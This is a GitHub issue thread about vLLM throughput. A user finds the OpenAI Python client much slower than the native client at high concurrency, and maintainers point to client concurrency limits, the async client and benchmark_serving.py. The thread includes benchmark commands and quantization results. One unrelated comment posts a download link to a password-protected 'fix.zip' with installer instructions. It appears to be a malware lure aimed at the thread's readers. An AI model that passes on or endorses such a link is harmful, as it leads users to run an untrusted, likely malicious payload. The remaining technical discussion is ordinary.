### ISSUE TITLE
[Performance]: 5x slower throught with openAI client/server than native one

### ISSUE THREAD

**Issue by stas00** [vllm-project/vllm#7935]
### Proposal to improve performance

I've been trying to write a reliable benchmark to be used with vllm, and I discovered that when I use the openAI client it can't scale. If I try to use 50 concurrent clients the gpu load goes down to 5% and the throughput is extremely slow. The more clients I add the worst things get. With a single client there is no problem.

I then used the same benchmark switching to the [vllm native client/server](https://docs.vllm.ai/en/latest/getting_started/examples/api_client.html) and I'm getting a 60-70% gpu util and 5x higher throughput.

I checked that I had the same `SamplingParams` reported by the server in both cases.

In parallel with those I was using https://github.com/grafana/k6 against both uses cases - with openAI entrypoints and with the native entrypoint - I can confirm that the server isn't the problem - in both cases I get high gpu util with k6 client and high throughput.

I thought that perhaps streaming was the cause but disabling it made a very small difference.

So everything points to the openAI client - I know that it's not your product but you recommend using it with [the openAI entrypoint](https://docs.vllm.ai/en/latest/getting_started/examples/api_client.html):

> """Example Python client for `vllm.entrypoints.api_server`
> NOTE: The API server is used only for demonstration and simple performance
> benchmarks. It is not intended for production use.
> For production use, we recommend `vllm serve` and the OpenAI client API.

So perhaps you have some insights to what I'm missing? I'm just using your examples as is.

vllm==0.5.5 here

Thank you!

### Your current environment (if you think it is necessary)

```text
PyTorch version: 2.4.0+cu121
Is debug build: False
CUDA used to build PyTorch: 12.1
ROCM used to build PyTorch: N/A

OS: Ubuntu 20.04.6 LTS (x86_64)
GCC version: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
Clang version: 10.0.0-4ubuntu1 
CMake version: version 3.30.2
Libc version: glibc-2.31

Python version: 3.10.14 | packaged by conda-forge | (main, Mar 20 2024, 12:45:18) [GCC 12.3.0] (64-bit runtime)
Python platform: Linux-5.15.0-1017-gcp-tcpx-x86_64-with-glibc2.31
Is CUDA available: True
CUDA runtime version: 12.1.105
CUDA_MODULE_LOADING set to: LAZY
GPU models and configuration: 
GPU 0: NVIDIA H100 80GB HBM3
GPU 1: NVIDIA H100 80GB HBM3

Nvidia driver version: 550.90.07
cuDNN version: Probably one of the following:
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn.so.8.9.4
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_adv_infer.so.8.9.4
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_adv_train.so.8.9.4
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_cnn_infer.so.8.9.4
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_cnn_train.so.8.9.4
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_ops_infer.so.8.9.4
/usr/local/cuda-12.0/targets/x86_64-linux/lib/libcudnn_ops_train.so.8.9.4
HIP runtime version: N/A
MIOpen runtime version: N/A
Is XNNPACK available: True

CPU:
Architecture:                         x86_64
CPU op-mode(s):                       32-bit, 64-bit
Byte Order:                           Little Endian
Address sizes:                        52 bits physical, 57 bits virtual
CPU(s):                               208
On-line CPU(s) list:                  0-207
Thread(s) per core:                   2
Core(s) per socket:                   52
Socket(s):                            2
NUMA node(s):                         2
Vendor ID:                            GenuineIntel
CPU family:                           6
Model:                                143
Model name:                           Intel(R) Xeon(R) Platinum 8481C CPU @ 2.70GHz
Stepping:                             8
CPU MHz:                              2699.998
BogoMIPS:                             5399.99
Hypervisor vendor:                    KVM
Virtualization type:                  full
L1d cache:                            4.9 MiB
L1i cache:                            3.3 MiB
L2 cache:                             208 MiB
L3 cache:                             210 MiB
NUMA node0 CPU(s):                    0-51,104-155
NUMA node1 CPU(s):                    52-103,156-207
Vulnerability Gather data sampling:   Not affected
Vulnerability Itlb multihit:          Not affected
Vulnerability L1tf:                   Not affected
Vulnerability Mds:                    Not affected
Vulnerability Meltdown:               Not affected
Vulnerability Mmio stale data:        Not affected
Vulnerability Reg file data sampling: Not affected
Vulnerability Retbleed:               Not affected
Vulnerability Spec rstack overflow:   Not affected
Vulnerability Spec store bypass:      Mitigation; Speculative Store Bypass disabled via prctl and seccomp
Vulnerability Spectre v1:             Mitigation; usercopy/swapgs barriers and __user pointer sanitization
Vulnerability Spectre v2:             Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI SW loop, KVM SW loop
Vulnerability Srbds:                  Not affected
Vulnerability Tsx async abort:        Not affected
Flags:                                fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid rtm avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves avx_vnni avx512_bf16 arat avx512vbmi umip avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid cldemote movdiri movdir64b fsrm md_clear serialize amx_bf16 avx512_fp16 amx_tile amx_int8 arch_capabilities

Versions of relevant libraries:
[pip3] flake8==7.1.0
[pip3] mypy-extensions==1.0.0
[pip3] numpy==1.26.3
[pip3] nvidia-nccl-cu12==2.20.5
[pip3] onnxruntime==1.18.1
[pip3] qtorch==0.3.0
[pip3] sentence-transformers==3.0.1
[pip3] torch==2.4.0
[pip3] torchvision==0.19.0
[pip3] transformers==4.44.0
[pip3] triton==3.0.0
[conda] numpy                     1.26.3                   pypi_0    pypi
[conda] nvidia-nccl-cu12          2.20.5                   pypi_0    pypi
[conda] qtorch                    0.3.0                    pypi_0    pypi
[conda] sentence-transformers     3.0.1                    pypi_0    pypi
[conda] torch                     2.4.0                    pypi_0    pypi
[conda] torchvision               0.19.0                   pypi_0    pypi
[conda] transformers              4.44.0                   pypi_0    pypi
[conda] triton                    3.0.0                    pypi_0    pypi
ROCM Version: Could not collect
Neuron SDK Version: N/A
vLLM Version: 0.5.5
vLLM Build Flags:
CUDA Archs: Not Set; ROCm: Disabled; Neuron: Disabled
GPU Topology:
GPU0    GPU1    CPU Affinity    NUMA Affinity   GPU NUMA ID
GPU0     X      NV18    57-63,161-166   1               N/A
GPU1    NV18     X      57-63,161-166   1               N/A

Legend:

  X    = Self
  SYS  = Connection traversing PCIe as well as the SMP interconnect between NUMA nodes (e.g., QPI/UPI)
  NODE = Connection traversing PCIe as well as the interconnect between PCIe Host Bridges within a NUMA node
  PHB  = Connection traversing PCIe as well as a PCIe Host Bridge (typically the CPU)
  PXB  = Connection traversing multiple PCIe bridges (without traversing the PCIe Host Bridge)
  PIX  = Connection traversing at most a single PCIe bridge
  NV#  = Connection traversing a bonded set of # NVLinks
```

### Before submitting a new issue...

- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.

**Comment by njhill** [comment]
Thanks @stas00. There may be scalability issues with the client but we are also aware of significant overhead in the current openai server layer that we are actively working on addressing.

It's probably also not a good idea to create multiple client instances in the same proc, I'd suggest to use a single client with asyncio or multiple threads.

**Comment by stas00** [comment]
Thank you for the suggestions, Nick.

I have already tried using multi-proc, it makes a very marginal improvement over multiple threads.

I have been using this approach:
```
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor, as_completed
    #with ProcessPoolExecutor() as executor:
    with ThreadPoolExecutor(max_workers=num_clients) as executor:
        for client_id, results in zip(clients, executor.map(parallel_request, clients)):
            ...
```
`ProcessPoolExecutor` does a tad better than `ThreadPoolExecutor` but it's still failing to scale.

Running k6 on the same instance is a breeze.

As I said the same `ProcessPoolExecutor` and `ThreadPoolExecutor` code scales just fine using your native solution https://docs.vllm.ai/en/latest/getting_started/examples/api_client.html - which makes the parallelization implementation not being the bottleneck.

So what would you recommend I use as a python client that I could crank up the concurrency with?

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by njhill** [comment]
I was suggesting instead of creating a client per worker, try having them all use the same client instance. I'm not sure whether the client is threadsafe so this may or may not work. An alternative would be to use the [async](https://github.com/openai/openai-python?tab=readme-ov-file#async-usage) variant of the client.

**Comment by stas00** [comment]
Thank you for this suggestion, Nick. I wasn't aware of the asyncio openAI API. Should it be mentioned somewhere in the performance section? I think it's critical for vllm, since if the client is the bottleneck it's vllm's acceptance that will suffer.

So I extended my benchmark to include asyncio version - it did improve the speed marginally but we are still miles away from high gpu util using it. This is a 10% improvement vs 500% needed to match other clients.

```
Non-streaming results are averages for 50 concurrent clients using openai api:

|  Stage   |  Latency  | Elapsed | Tokens |
|          |  tok/sec  | seconds |        |
| :------- | --------: | ------: | -----: |
| Combined |     19.15 |   80.41 |   1540 |



Non-streaming results are averages for 50 concurrent clients using async-openai api:

|  Stage   |  Latency  | Elapsed | Tokens |
|          |  tok/sec  | seconds |        |
| :------- | --------: | ------: | -----: |
| Combined |     21.01 |   71.81 |   1508 |
```

going to look into `benchmarks/benchmark_server.py` next - thank you for the suggestion, @robertgshaw2-neuralmagic

**Comment by stas00** [comment]
@robertgshaw2-neuralmagic, your suggestion to use https://github.com/vllm-project/vllm/blob/main/benchmarks/benchmark_serving.py seems to be a good one! I need to study it to see where my naive implementation is inefficient.

Perhaps it'd be useful to document it as something a user could use to benchmark their use-cases? I somehow missed it as it looked dev-facing and thus started writing my own, but it looks to be totally ready to be used by end users.

Also how does this benchmark linked from the top level README.md gets updated? https://buildkite.com/vllm/performance-benchmark/builds/4068 - it seems to be quite old - many versions were published since it was made - I'm not sure how to find the most recent one - I see only partial benchmark reports on that website.

But good news, now that I have this tool - I can go and try your autoAWQ suggestion, Robert.

**Comment by robertgshaw2-neuralmagic** [comment]
> @robertgshaw2-neuralmagic, your suggestion to use https://github.com/vllm-project/vllm/blob/main/benchmarks/benchmark_serving.py seems to be a good one! I need to study it to see where my naive implementation is inefficient.
> 
> Perhaps it'd be useful to document it as something a user could use to benchmark their use-cases? I somehow missed it as it looked dev-facing and thus started writing my own, but it looks to be totally ready to be used by end users.
> 
> Also how does this benchmark linked from the top level README.md gets updated? https://buildkite.com/vllm/performance-benchmark/builds/4068 - it seems to be quite old - many versions were published since it was made - I'm not sure how to find the most recent one - I see only partial benchmark reports on that website.
> 
> But good news, now that I have this tool - I can go and try your autoAWQ suggestion, Robert.

Couple things:

- the async openai client has a max concurrency (I too ran into this problem trying to simplify some benchmarking runs I was doing). So, even if you send 10000 requests, only a subset will actually go up to the server
- the benchmark script uses aiohttp, and this limit does not exist
- the benchmarking in the ci uses these scripts
- the benchmark scripts are targeted at developers, but you can feel free to use it as you see fit and we welcome any PRs to improve our docs

RE: quantization - please try out LLM-compressor!

**Comment by stas00** [comment]
> the async openai client has a max concurrency (I too ran into this problem trying to simplify some benchmarking runs I was doing). So, even if you send 10000 requests, only a subset will actually go up to the server

That's super useful to know, Robert. Do you by chance know if this documented somewhere, in particular what is the current limit and what does it depend on? cpu-cores, ram, else? is there a plan to fix that (Issue in question?) I'm aware that this is outside of vllm.

And what concurrency did you hit in your experiments that it was still ok? i.e. what is the size of the subset you mentioned.

> the rest!

appreciate the notes - let me experiment some more with this new tool so that I feel comfortable with getting consistent results (as I see some fluctuations which would impact the measuring of optimization features). Any suggestions to how I should run this benchmark so that I get more consistent outputs if I repeat the same benchmark multiple times in a row?

Right now I have been using:

```
python benchmark_serving.py \
    --backend vllm \
    --model $model \
    --dataset-name sharegpt \
    --dataset-path ShareGPT_V3_unfiltered_cleaned_split.json \
    --port 9999 \
    --save-result \
    --result-dir results \
    --result-filename test.json \
    --num-prompts 50 \
    --request-rate inf \
    --seed 42
```

probably more prompts?

Also is there a way this benchmark can tell me the upper limit of concurrent requests vllm can handle before it starts impacting per-user throughput / ttft? other than doing multiple tries and finding the concurrency where TTFT+decode througput is reasonable still?

> quantization - please try out LLM-compressor!

yes, now I'm going to re-try them all. I tried them first with a naive single client and couldn't tell any difference. So now I should be good to see the actual impact.

**Comment by robertgshaw2-neuralmagic** [comment]
> > the async openai client has a max concurrency (I too ran into this problem trying to simplify some benchmarking runs I was doing). So, even if you send 10000 requests, only a subset will actually go up to the server
> 
> That's super useful to know, Robert. Do you by chance know if this documented somewhere, in particular what is the current limit and what does it depend on? cpu-cores, ram, else? is there a plan to fix that (Issue in question?) I'm aware that this is outside of vllm.

I found out when I was observing the vllm logs and then inspecting the openai client source code.

I don't quite understand the use case for sending N requests from the same client though, other than for benchmarking. Can you elaborate more on your use case?

> And what concurrency did you hit in your experiments that it was still ok? i.e. what is the size of the subset you mentioned.
> 
> > the rest!
> 
> appreciate the notes - let me experiment some more with this new tool so that I feel comfortable with getting consistent results (as I see some fluctuations which would impact the measuring of optimization features). Any suggestions to how I should run this benchmark so that I get more consistent outputs if I repeat the same benchmark multiple times in a row?
> 
> Right now I have been using:
> 
> ```
> python benchmark_serving.py \
>     --backend vllm \
>     --model $model \
>     --dataset-name sharegpt \
>     --dataset-path ShareGPT_V3_unfiltered_cleaned_split.json \
>     --port 9999 \
>     --save-result \
>     --result-dir results \
>     --result-filename test.json \
>     --num-prompts 50 \
>     --request-rate inf \
>     --seed 42
> ```
> 
> probably more prompts?
> 
> Also is there a way this benchmark can tell me the upper limit of concurrent requests vllm can handle before it starts impacting per-user throughput / ttft? other than doing multiple tries and finding the concurrency where TTFT+decode througput is reasonable still?

The key thing with quantization is that performance is a function of the request rate on the application. So, the sample you have here is effectively an offline batch use case.

Personally, I like to look at TPOT and TTFT as a function of queries per second on the model. In my blog, I discuss how various quantization schemes impact performance
- https://neuralmagic.com/blog/llm-compressor-is-here-faster-inference-with-vllm/

I included details on how to replicate the benchmarks:
```
MODEL=MODEL_STUB_TO_BENCHMARK
TOTAL_SECONDS=120
QPS_RATES=("1" "3" "5" "7" "9")

for QPS in ${QPS_RATES[@]}; do
    NUM_PROMPTS=$((TOTAL_SECONDS * QPS))
    echo "===== RUNNING NUM_PROMPTS = $NUM_PROMPTS QPS = $QPS ====="

    python3 benchmarks/benchmark_serving.py \
        --model $MODEL \
        --dataset-name sonnet --sonnet-input-len 550 --sonnet-output-len 150 \
        --dataset-path benchmarks/sonnet.txt \
        --num-prompts $NUM_PROMPTS --request-rate $QPS
done
```

> > quantization - please try out LLM-compressor!
> 
> yes, now I'm going to re-try them all. I tried them first with a naive single client and couldn't tell any difference. So now I should be good to see the actual impact.

One more note: we have some performance overheads in the OpenAI server we are very close to resolving. I can ping you again once these are complete.

**Comment by robertgshaw2-neuralmagic** [comment]
Please feel free to post your results here once you have them, I can take a look and help you understand what is going on.

**Comment by binarycrayon** [comment]
we are seeing this as well. Reverting to 0.5.3
Also subbed this.

**Comment by robertgshaw2-neuralmagic** [comment]
> we are seeing this as well. Reverting to 0.5.3 Also subbed this.

@binarycrayon This issue does not have anything to do with vLLM version - can you elaborate on what you are seeing?

**Comment by binarycrayon** [comment]
I'm running vllm with 9 loras adapters with openai server against our product. 
The token per second has dropped significantly in `0.5.5` compared to `0.5.3`.  I could provide some data later but a bit tied up this week.
Also `0.5.4` seemed fine but that release introduced bug in grafana metrics so we skipped it.

**Comment by robertgshaw2-neuralmagic** [comment]
> I'm running vllm with 9 loras adapters with openai server against our product.
> The token per second has dropped significantly in `0.5.5` compared to `0.5.3`. I could provide some data later but a bit tied up this week.
> Also `0.5.4` seemed fine but that release introduced bug in grafana metrics so we skipped it.

Thank you. Could you try running on v0.5.5 with —disable-frontend-multiprocessing in the launch script?

**Comment by stas00** [comment]
> I don't quite understand the use case for sending N requests from the same client though, other than for benchmarking. Can you elaborate more on your use case?

Benchmarking. There are ~6 different quantization techniques theoretically supported by vllm. So how would you know which one works the best if you don't measure performance? (assuming quality is on par).

It's a big thing - all these competing frameworks - so it's critical to be able to quickly measure which one delivers the best speed at given hardware, while keeping quality.

I think ideally I'd have an abstraction layer where the server software can use multiple frameworks and switch between them at will, depending on the use case. For example, if we look at https://buildkite.com/vllm/performance-benchmark/builds/4068 clearly - there is no clear winner:

![snapshot_984](https://github.com/user-attachments/assets/c0372149-0d9c-419c-88a2-e730d6e6a768)

and even if there was one - a few months later the winner is likely to be loser and vice versa.

So as I flagged earlier that benchmark you shared is 2-months old and surely at least vllm has improved since then, so what's the point of showing probably no longer true information now.

> One more note: we have some performance overheads in the OpenAI server we are very close to resolving. I can ping you again once these are complete.

Yes, please, Robert!

**Comment by stas00** [comment]
And I found your openAI completions client replacement with `aiohttp`:
https://github.com/vllm-project/vllm/blob/61e592747c28c9fbd6861e48b825c796e09da02f/benchmarks/backend_request_func.py#L222-L298

**Comment by stas00** [comment]
ok, so I will be running various setups all around a llama2-8b model w/ `vllm==0.5.5`

Baseline:

```
============ Serving Benchmark Result ============
Successful requests:                     50
Benchmark duration (s):                  6.86
Total input tokens:                      12180
Total generated tokens:                  11502
Request throughput (req/s):              7.29
Input token throughput (tok/s):          1775.38
Output token throughput (tok/s):         1676.56
---------------Time to First Token----------------
Mean TTFT (ms):                          232.39
Median TTFT (ms):                        273.13
P99 TTFT (ms):                           281.37
-----Time per Output Token (excl. 1st token)------
Mean TPOT (ms):                          11.41
Median TPOT (ms):                        10.46
P99 TPOT (ms):                           22.39
---------------Inter-token Latency----------------
Mean ITL (ms):                           9.54
Median ITL (ms):                         9.42
P99 ITL (ms):                            13.13
==================================================
```

AutoAWQ (worse than the baseline)
```
============ Serving Benchmark Result ============
Successful requests:                     50
Benchmark duration (s):                  8.46
Total input tokens:                      12180
Total generated tokens:                  11452
Request throughput (req/s):              5.91
Input token throughput (tok/s):          1439.98
Output token throughput (tok/s):         1353.91
---------------Time to First Token----------------
Mean TTFT (ms):                          257.20
Median TTFT (ms):                        246.24
P99 TTFT (ms):                           321.78
-----Time per Output Token (excl. 1st token)------
Mean TPOT (ms):                          14.22
Median TPOT (ms):                        12.84
P99 TPOT (ms):                           26.48
---------------Inter-token Latency----------------
Mean ITL (ms):                           11.78
Median ITL (ms):                         11.67
P99 ITL (ms):                            15.65
==================================================


```

BNB (much worse than the baseline)

```
============ Serving Benchmark Result ============
Successful requests:                     50
Benchmark duration (s):                  26.51
Total input tokens:                      12180
Total generated tokens:                  10946
Request throughput (req/s):              1.89
Input token throughput (tok/s):          459.46
Output token throughput (tok/s):         412.91
---------------Time to First Token----------------
Mean TTFT (ms):                          375.60
Median TTFT (ms):                        386.13
P99 TTFT (ms):                           484.51
-----Time per Output Token (excl. 1st token)------
Mean TPOT (ms):                          39.58
Median TPOT (ms):                        35.92
P99 TPOT (ms):                           66.11
---------------Inter-token Latency----------------
Mean ITL (ms):                           35.40
Median ITL (ms):                         34.77
P99 ITL (ms):                            40.73
==================================================
```

**Comment by stas00** [comment]
And the good results:

&#x2705; INT8 W8A8

```
============ Serving Benchmark Result ============
Successful requests:                     50
Benchmark duration (s):                  6.18
Total input tokens:                      12180
Total generated tokens:                  11499
Request throughput (req/s):              8.10
Input token throughput (tok/s):          1972.46
Output token throughput (tok/s):         1862.18
---------------Time to First Token----------------
Mean TTFT (ms):                          209.19
Median TTFT (ms):                        244.13
P99 TTFT (ms):                           248.86
-----Time per Output Token (excl. 1st token)------
Mean TPOT (ms):                          10.74
Median TPOT (ms):                        9.47
P99 TPOT (ms):                           28.31
---------------Inter-token Latency----------------
Mean ITL (ms):                           8.70
Median ITL (ms):                         8.63
P99 ITL (ms):                            12.28
==================================================
```

**Comment by robertgshaw2-neuralmagic** [comment]
What QPS rate are you running at?

I would suggest running the serving experiments for ~2 minutes, such that the server can come into equilibrium

**Comment by stas00** [comment]
qps=50 all at once
```
python benchmark_serving.py \
    --backend vllm \
    --model $MODEL \
    --dataset-name sharegpt \
    --dataset-path ShareGPT_V3_unfiltered_cleaned_split.json \
    --port 9999 \
    --save-result \
    --result-dir results \
    --result-filename test.json \
    --num-prompts 50 \
    --request-rate inf \
    --seed 42
```

The problem is that if I make the qps much higher it's likely to hit a queue, no? then the measurements would be wrong for the purpose of the benchmark.

That's why earlier I asked how to find the threshold at which vllm starts queueing up the requests.

It sounds like the benchmark needs a new config to tell it how long to run for?

Many benchmarks usually have a warmup period first. Though how would one warmup here. I guess run the first X requests and don't count them towards stats?

**Comment by stas00** [comment]
KV Cache quantizations

1. FP8 E5M2 KV Cache made no difference.

2. FP8 E4M3 KV Cache (to be figured out yet as it's not documented well) https://docs.vllm.ai/en/latest/quantization/fp8_e4m3_kvcache.html
